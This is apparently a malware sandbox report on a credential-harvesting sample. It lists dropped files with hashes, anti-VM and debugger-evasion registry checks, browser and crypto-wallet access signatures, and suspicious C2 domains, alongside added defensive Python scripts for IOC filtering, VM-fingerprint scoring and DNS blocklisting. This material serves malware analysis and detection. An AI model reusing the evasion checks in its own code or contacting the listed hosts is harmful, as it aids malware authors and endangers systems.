memory/5940-1039-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/5940-1052-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/5836-1061-0x0000023D2FB90000-0x0000023D2FB98000-memory.dmp
memory/6108-1070-0x0000000000DF0000-0x000000000128B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/4300-1087-0x0000000000740000-0x00000000007B0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 6b297d474a7a11e5cf3b52665631b697 |
| SHA1 | cf0d1d7692bdfb3a9d7082f20be8750e39627fd0 |
| SHA256 | c0b047a7c0afe16a7f886284e0e5b4ae6dffb64db39f014c7a92671f73e521bc |
| SHA512 | e29ca1eb19f09b051b2b33078ef88416e563befa26bab92d6986baa68bd084a00e38f2a6f3bdd1b2d2ae5a3f67421004009b3a5f108112144631f841fbd805a6 |
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/4996-1138-0x0000023AFB8D0000-0x0000023AFB8E2000-memory.dmp
memory/4996-1139-0x0000023AFBC70000-0x0000023AFBC80000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs-1.js
| MD5 | d9bea1903f5e177cdc18bbcc1dab0775 |
| SHA1 | e653e1205fdd9b3c01606f6ed62c1e80d84a0c45 |
| SHA256 | 7ff37b4a51be372acf0e650bd51b71a851b593836562194ed9346decb4fb1f58 |
| SHA512 | debe8f0385e2b471c9abdd59c5da8b8fc0a28864fee0aed4aad394087f8796b2f3f9e45959c0d20d43eb05ceb0f5a90d2eb4324e304dbccc52c46f3ddf76f1d1 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin
| MD5 | bad4b2be63239af9c7e2d80768239001 |
| SHA1 | 00c157d24e3aca881763f11eab3a0b3d5e239d0f |
| SHA256 | 93847ba39ad58bc09fa31c8ceb83631395e97e81360744ef6fd7ae07c2fb367c |
| SHA512 | 2b925de703b41d6630785fb56d63e9b02b70e8944e76d04439d6673d71c5e3928b0d9f0dda32abab00e566eb98beb83ee6dbb1549108fe0a4df1ae94065a3003 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/6740-1353-0x0000000000BB0000-0x0000000000C10000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\8PKTZ3BC\microsoft.windows[1].xml
| MD5 | 77cc82955ce893463f41601027f87ac2 |
| SHA1 | 735452540cbaec9e70d0e63c0d8433a3ea230678 |
| SHA256 | 9be9016f70328b4742f54c3a3bb7387bccd76210084593015a42972593d48a34 |
| SHA512 | 0b060b863f9ec90c3c9e3bac05111f0a793c570b443af6a982df027d13f4377c4b50662c7cbd7e1862fdd985410a08895b45eb80d86a95a950bdc7a4ba727ac8 |
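The dropped-file and memory-dump listing above is long, and not every entry deserves a blocklist slot: several rows carry the digests of an empty file (MD5 d41d8cd9...), and the cached service[1].htm has the digests of the single character "0". The script below is an added example for this page, not output of the sandbox or code from any of the malware families named in the report. It parses a few lines copied verbatim from the listing, labels entries whose content is trivially known and cross-checks that all four listed digests agree with that content, groups the memory dumps by PID to show which address range was captured repeatedly, and returns the SHA256 set that is actually worth acting on. The reading of the dump file name as memory/PID-index-start-end-memory.dmp, the table of trivial contents and every function name are this example's own assumptions.

```python
"""Parse the dropped-file / memory-dump listing of a sandbox report into IOCs.

Added example for this page; not part of the sandbox's output.  SAMPLE lines
are copied from the report above.  The TRIVIAL_CONTENTS table, the field
names and the function names are this example's own constructions.
"""
import hashlib
import re
from collections import defaultdict

# Copied from the report: three memory dumps of PID 2816 and three dropped
# files, two of which have well-known digests (see TRIVIAL_CONTENTS).
SAMPLE = r"""
memory/2816-30-0x00000000008C1000-0x00000000008EF000-memory.dmp
memory/2816-31-0x00000000008C0000-0x0000000000D7F000-memory.dmp
memory/2816-32-0x00000000008C0000-0x0000000000D7F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\APYB1149\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
"""

# Assumed layout of a dump name: memory/<pid>-<snapshot index>-<start>-<end>-memory.dmp
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")

# Contents whose digests turn up in dropped-file lists without saying anything
# about the malware (this table is the example's own, not the report's).
TRIVIAL_CONTENTS = {b"": "empty file", b"0": "single byte '0'",
                    b"1": "single byte '1'", b"\r\n": "CRLF only"}
ALGOS = ("MD5", "SHA1", "SHA256", "SHA512")


def digests(data: bytes) -> dict:
    """All four digests the report lists, keyed the way the report keys them."""
    return {a: hashlib.new(a.lower(), data).hexdigest() for a in ALGOS}


def parse_report(text: str):
    """Split report lines into dropped files (path + hashes) and memory regions."""
    files, regions, current = [], [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            regions.append({"pid": int(pid), "seq": int(seq),
                            "start": int(start, 16), "end": int(end, 16)})
            current = None
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current["hashes"][m.group(1)] = m.group(2).lower()
            continue
        current = {"path": line, "hashes": {}}   # any other line starts a file entry
        files.append(current)
    return files, regions


def classify_file(entry: dict) -> str:
    """Label a file whose content is trivially known and check that all four
    listed digests agree with it (catches transcription errors in a hash
    table).  Anything else is 'unknown' and stays in the IOC set."""
    for data, label in TRIVIAL_CONTENTS.items():
        expected = digests(data)
        if entry["hashes"].get("SHA256") == expected["SHA256"]:
            bad = [a for a in ALGOS if a in entry["hashes"] and entry["hashes"][a] != expected[a]]
            return label if not bad else f"{label} (inconsistent: {','.join(bad)})"
    return "unknown"


def summarize_regions(regions):
    """Per PID, each distinct [start, end) range with its size and how many
    snapshots captured it; a range present at several snapshots is stable
    across the run and a sensible first dump to pull for static analysis."""
    counts = defaultdict(lambda: defaultdict(int))
    for r in regions:
        counts[r["pid"]][(r["start"], r["end"])] += 1
    return {pid: [{"start": hex(s), "end": hex(e), "size": e - s, "dumps": n}
                  for (s, e), n in sorted(ranges.items(), key=lambda kv: (-kv[1], kv[0]))]
            for pid, ranges in counts.items()}


def actionable_sha256(files) -> set:
    """SHA256 values worth blocklisting: everything except trivial-content files."""
    return {f["hashes"]["SHA256"] for f in files
            if "SHA256" in f["hashes"] and classify_file(f) == "unknown"}


if __name__ == "__main__":
    files, regions = parse_report(SAMPLE)
    for f in files:
        print(classify_file(f), "<-", f["path"])
    print(summarize_regions(regions))
    print(actionable_sha256(files))
```

Run against the full listing, the same logic separates the PowerShell and Firefox housekeeping files from the numbered Temp\1010...\*.exe payload drops, and the repeated 0x8C0000-0xD7F000 range of PID 2816 (about 4.7 MB, dumped at many snapshots) stands out as the region to carve first.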
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 23:11
Reported
2025-03-05 23:14
Platform
win7-20250207-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Browser Information Discovery
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 272 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 272 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 272 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 272 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | C:\Windows\SysWOW64\WerFault.exe |
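The registry signatures above (the ACPI DSDT\VBOX__ key, the SystemBiosVersion and VideoBiosVersion values, the Software\Wine key and the NLS\Language key) are individually weak: inventory and licensing software reads BIOS strings all day, and a language check is discovery, not evasion. What makes the sample's behaviour diagnostic is that one process performs several of these checks together before doing anything else. The script below is an added example for this page, not sandbox code or a vendor rule. It parses the report's own indicator rows, normalises the kernel-style \REGISTRY\... paths, maps each read to a fingerprint category with a weight, and gives a per-process verdict once the summed weight crosses a threshold. The rule names, weights, threshold and the extra "C:\Program Files\Inventory\agent.exe" row are this example's own constructions; the ACPI rule also covers the FADT and RSDT tables, which is a generalisation beyond the single DSDT key the report shows.

```python
"""Score a process's registry reads for sandbox/VM fingerprinting.

Added example for this page; not part of the sandbox's output.  The first five
SAMPLE rows are copied from the signature tables above; the sixth (an inventory
agent) is constructed to show a benign single-read process.  Rules, weights and
THRESHOLD are this example's own.  The ACPI rule covers FADT/RSDT as well as
the DSDT key the report shows.
"""
import re
from collections import defaultdict

SAMPLE = r"""
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files\Inventory\agent.exe | N/A |
"""

# (category, weight, pattern).  Weights are illustrative: a lone BIOS-string
# read is routine; the ACPI vendor table and the Wine key are much rarer in
# legitimate software; the language key is discovery (T1614.001), weight 0.
RULES = [
    ("acpi_vbox",    2, re.compile(r"\\HARDWARE\\ACPI\\(DSDT|FADT|RSDT)\\VBOX__", re.I)),
    ("bios_strings", 1, re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$", re.I)),
    ("wine",         2, re.compile(r"\\Software\\Wine$", re.I)),
    ("language",     0, re.compile(r"\\Control\\NLS\\Language$", re.I)),
]
THRESHOLD = 3   # two independent VM/emulator checks, or one strong one plus BIOS strings

ROW_RE = re.compile(r"^\|\s*(?P<desc>[^|]+?)\s*\|\s*(?P<key>[^|]+?)\s*\|\s*(?P<proc>[^|]+?)\s*\|\s*(?P<target>[^|]+?)\s*\|$")
SID_RE = re.compile(r"^\\REGISTRY\\USER\\S-1-5-21-[\d-]+", re.I)


def normalize(path: str) -> str:
    """Rewrite kernel-style \\REGISTRY\\... paths to HKLM/HKCU/HKU form so the
    same rules serve sandbox logs and user-mode telemetry."""
    path = SID_RE.sub("HKCU", path)
    path = re.sub(r"^\\REGISTRY\\MACHINE", "HKLM", path, flags=re.I)
    path = re.sub(r"^\\REGISTRY\\USER", "HKU", path, flags=re.I)
    return path


def parse_rows(text: str):
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m and m.group("key") != "Indicator":          # skip a header row if present
            rows.append({"desc": m.group("desc"), "key": normalize(m.group("key")),
                         "proc": m.group("proc")})
    return rows


def score_processes(rows):
    """Per process: categories that fired, summed weight, verdict.  Each
    category counts once, so a loop re-reading one key does not inflate it."""
    hits = defaultdict(dict)
    for r in rows:
        for cat, weight, pat in RULES:
            if pat.search(r["key"]):
                hits[r["proc"]].setdefault(cat, weight)
    return {proc: {"categories": sorted(cats), "score": sum(cats.values()),
                   "anti_analysis": sum(cats.values()) >= THRESHOLD}
            for proc, cats in hits.items()}


if __name__ == "__main__":
    for proc, verdict in score_processes(parse_rows(SAMPLE)).items():
        print(verdict, "<-", proc)
```

One caveat for anyone porting this to host telemetry: Sysmon's registry events (12 key create/delete, 13 value set, 14 rename) do not record key opens or value queries, so the rows the sandbox produces here have no direct Sysmon equivalent; you need an API-monitoring source or an EDR that hooks registry reads.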
Processes
C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe
"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 272 -s 1216
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
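The Network table shows four DNS lookups through 8.8.8.8 but only one TCP connection, to 172.67.189.66:443 for moderzysics.top. Pairing lookups with the connections that follow them is the quickest way to tell the live C2 candidate from names that never got past the resolver in this run, and 172.67.189.66 sits in Cloudflare's 172.64.0.0/13, so the address itself is shared fronting infrastructure and a poor blocklist entry. The script below is an added example for this page, not sandbox code; it parses the five rows above, splits queried-only from contacted domains, flags fronted IPs, and returns a domain list plus a (here empty) IP list for blocking. The fronting-prefix table and all function names are this example's own.

```python
"""Correlate DNS lookups with the TCP connections that followed them.

Added example for this page; not part of the sandbox's output.  SAMPLE rows are
copied from the Network table above.  FRONTING_PREFIXES is this example's own
list (172.64.0.0/13 is a Cloudflare range); function names are illustrative.
"""
import ipaddress
import re
from collections import defaultdict

SAMPLE = """
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
"""

ROW_RE = re.compile(r"^\|\s*(\w+)\s*\|\s*([\d.]+):(\d+)\s*\|\s*([^|\s]+)\s*\|\s*(udp|tcp)\s*\|$")

# Shared reverse-proxy/CDN space: an address here fronts many unrelated sites,
# so hunt and block on the domain (and TLS SNI), not on the IP.
FRONTING_PREFIXES = [ipaddress.ip_network("172.64.0.0/13")]   # Cloudflare


def parse_flows(text: str):
    flows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            country, ip, port, domain, proto = m.groups()
            flows.append({"country": country, "ip": ip, "port": int(port),
                          "domain": domain, "proto": proto})
    return flows


def is_fronted(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in FRONTING_PREFIXES)


def correlate(flows):
    """Split names that were only looked up from names that were contacted.
    A lookup with no follow-up connection in the capture means the name did
    not resolve or nothing connected before the run ended; the contacted
    names are the live C2 candidates."""
    queried, contacted = set(), defaultdict(set)
    for f in flows:
        if f["proto"] == "udp" and f["port"] == 53:
            queried.add(f["domain"])
        else:
            contacted[f["domain"]].add((f["ip"], f["port"]))
    return {
        "queried_only": sorted(queried - set(contacted)),
        "contacted": {d: sorted(eps) for d, eps in contacted.items()},
        "fronted_ips": sorted({ip for eps in contacted.values()
                               for ip, _ in eps if is_fronted(ip)}),
    }


def blocklist(report: dict):
    """Domains: everything queried or contacted.  IPs: only those that are not
    shared fronting infrastructure."""
    domains = set(report["queried_only"]) | set(report["contacted"])
    ips = {ip for eps in report["contacted"].values() for ip, _ in eps} - set(report["fronted_ips"])
    return sorted(domains), sorted(ips)


if __name__ == "__main__":
    rep = correlate(parse_flows(SAMPLE))
    print(rep)
    print(blocklist(rep))
```

For this capture the result is four domains to block and no IP: the three queried-only names still belong on the list, since the same loader will retry them on a host where they do resolve.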
Files
memory/272-0-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-1-0x0000000076ED0000-0x0000000076ED2000-memory.dmp
memory/272-2-0x0000000000FE1000-0x0000000001041000-memory.dmp
memory/272-4-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-3-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-5-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-6-0x0000000000FE0000-0x0000000001307000-memory.dmp
memory/272-7-0x0000000000FE1000-0x0000000001041000-memory.dmp